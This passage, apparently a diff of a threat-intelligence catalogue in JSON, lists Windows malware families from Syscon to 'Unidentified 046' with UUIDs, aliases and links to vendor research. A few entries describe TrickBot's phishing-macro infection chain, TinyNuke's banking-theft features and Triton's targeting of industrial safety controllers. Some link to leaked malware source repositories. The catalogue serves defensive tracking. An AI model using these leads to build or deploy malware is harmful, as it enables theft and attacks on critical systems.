"http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", - "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" - ] - }, - "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", - "value": "Syscon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - }, - "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", - "value": "SysGet", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" - ] - }, - "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", - "value": "SysScan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", - "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", - "https://www.secureworks.com/research/srizbi", - "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" - ] - }, - "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", - "value": "Szribi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", - "value": "TabMsgSQL", - "description": "" - }, - { - "meta": { - "synonyms": [ - "simbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", - "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" - ] - }, - "uuid": "94323b32-9566-450b-8480-5f9f53b57948", - "value": "taidoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", - "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", - "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" - ] - }, - "uuid": "b0467c03-824f-4071-8668-f056110d2a50", - "value": "Taleret", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" - ] - }, - "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", - "value": "Tandfuy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", - "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" - ] - }, - "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", - "value": "Tapaoux", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", - "value": "Tarsip", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" - ] - }, - "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", - "value": "tDiscoverer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", - "http://www.clearskysec.com/tulip/" - ] - }, - "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", - "value": "TDTESS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - }, - "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", - "value": "TeleBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", - "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", - "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" - ] - }, - "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", - "value": "TeleDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" - ] - }, - "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", - "value": "Tempedreve", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Fakem RAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", - "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", - "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", - "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" - ] - }, - "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", - "value": "Terminator RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "cryptesla" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", - "https://blogs.cisco.com/security/talos/teslacrypt", - "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", - "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", - "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", - "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" - ] - }, - "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", - "value": "TeslaCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Alphabot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", - "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" - ] - }, - "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", - "value": "Thanatos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", - "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" - ] - }, - "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", - "value": "Thanatos Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - }, - "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", - "value": "ThreeByte", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - }, - "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", - "value": "ThumbThief", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" - ] - }, - "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", - "value": "Thunker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", - "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" - ] - }, - "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", - "value": "Tidepool", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Zusy", - "TinyBanker", - "Illi" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", - "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", - "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", - "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", - "http://garage4hackers.com/entry.php?b=3086", - "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", - "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", - "http://contagiodump.blogspot.com/2012/06/amazon.html", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" - ] - }, - "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", - "value": "Tinba", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", - "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" - ] - }, - "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", - "value": "TinyLoader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "NukeBot", - "Nuclear Bot", - "MicroBankingTrojan", - "Xbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", - "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", - "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", - "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", - "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", - "https://krebsonsecurity.com/tag/nuclear-bot/" - ] - }, - "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", - "value": "TinyNuke", - "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" - ] - }, - "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", - "value": "TinyTyphon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", - "value": "TinyZbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" - ] - }, - "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", - "value": "Tiop", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Gheg" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", - "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", - "https://www.cert.pl/en/news/single/tofsee-en/", - "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" - ] - }, - "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", - "value": "Tofsee", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", - "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", - "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" - ] - }, - "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", - "value": "TorrentLocker", - "description": "" - }, - { - "meta": { - "synonyms": [ - "huntpos" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", - "http://adelmas.com/blog/treasurehunter.php", - "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", - "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" - ] - }, - "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", - "value": "TreasureHunter", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Trickster", - "TheTrick", - "TrickLoader" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", - "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", - "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", - "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", - "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", - "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", - "https://www.youtube.com/watch?v=KMcSAlS9zGE", - "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", - "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", - "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", - "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", - "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", - "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", - "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", - "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", - "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", - "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "http://www.malware-traffic-analysis.net/2018/02/01/", - "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", - "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", - "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", - "https://www.youtube.com/watch?v=EdchPEHnohw", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://www.youtube.com/watch?v=lTywPmZEU1A", - "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", - "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", - "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" - ] - }, - "uuid": "c824813c-9c79-4917-829a-af72529e8329", - "value": "TrickBot", - "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed" - }, - { - "meta": { - "synonyms": [ - "Trisis", - "HatMan" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://dragos.com/blog/trisis/TRISIS-01.pdf", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", - "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" - ] - }, - "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", - "value": "win.triton", - "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/5loyd/trochilus/" - ] - }, - "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", - "value": "Trochilus RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Shade" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" - ] - }, - "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", - "value": "Troldesh", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" - ] - }, - "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", - "value": "Trump Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" - ] - }, - "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", - "value": "Tsifiri", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] - }, - "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", - "value": "TURNEDUP", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", - "https://www.lastline.com/labsblog/tyupkin-atm-malware/" - ] - }, - "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", - "value": "Tyupkin", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Akagi" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", - "https://github.com/hfiref0x/UACME" - ] - }, - "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", - "value": "UACMe", - "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", - "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns", - "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" - ] - }, - "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", - "value": "UDPoS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", - "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" - ] - }, - "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", - "value": "Uiwix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" - ] - }, - "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", - "value": "Unidentified 001", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" - ] - }, - "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", - "value": "Unidentified 003", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" - ] - }, - "uuid": "", - "value": "", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" - ] - }, - "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", - "value": "Unidentified 006", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", - "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" - ] - }, - "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", - "value": "Unidentified 013 (Korean)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", - "https://wikileaks.org/ciav7p1/cms/page_34308128.html" - ] - }, - "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", - "value": "Unidentified 020 (Vault7)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" - ] - }, - "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", - "value": "Unidentified 022 (Ransom)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" - ] - }, - "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", - "value": "Unidentified 023", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", - "https://twitter.com/malwrhunterteam/status/789161704106127360" - ] - }, - "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", - "value": "Unidentified 024 (Ransomware)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", - "http://malware-traffic-analysis.net/2016/05/09/index.html" - ] - }, - "uuid": "f43a0e38-2394-4538-a123-4a0457096058", - "value": "Unidentified 025 (Clickfraud)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" - ] - }, - "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", - "value": "Unidentified 028", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" - ] - }, - "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", - "value": "Unidentified 029", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", - "https://twitter.com/JaromirHorejsi/status/877811773826641920" - ] - }, - "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", - "value": "Filecoder", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" - ] - }, - "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", - "value": "Unidentified 031", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" - ] - }, - "uuid": "799921d7-48e8-47a6-989e-487b527af37a", - "value": "Unidentified 032", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" - ] - }, - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_034", - "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" - ] - }, - "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", - "value": "Unidentified 034", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" - ] - }, - "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", - "value": "Unidentified 035", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" - ] - }, - "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", - "value": "Unidentified 037", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" - ] - }, - "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", - "value": "Unidentified 038", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" - ] - }, - "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", - "value": "Unidentified 039", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" - ] - }, - "uuid": "88d70171-fc89-44d1-8931-035c0b095247", - "value": "Unidentified 041", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", - "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" - ] - }, - "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", - "value": "Unidentified 042", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" - ] - }, - "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", - "value": "Unidentified 044", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" - ] - }, - "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", - "value": "Unidentified 045", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", - "https://twitter.com/DrunkBinary/status/1006534471687004160" - ] - }, - "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", - "value": "Unidentified 046", - "description": "" - }, - { - "meta": { - "synonyms": [], 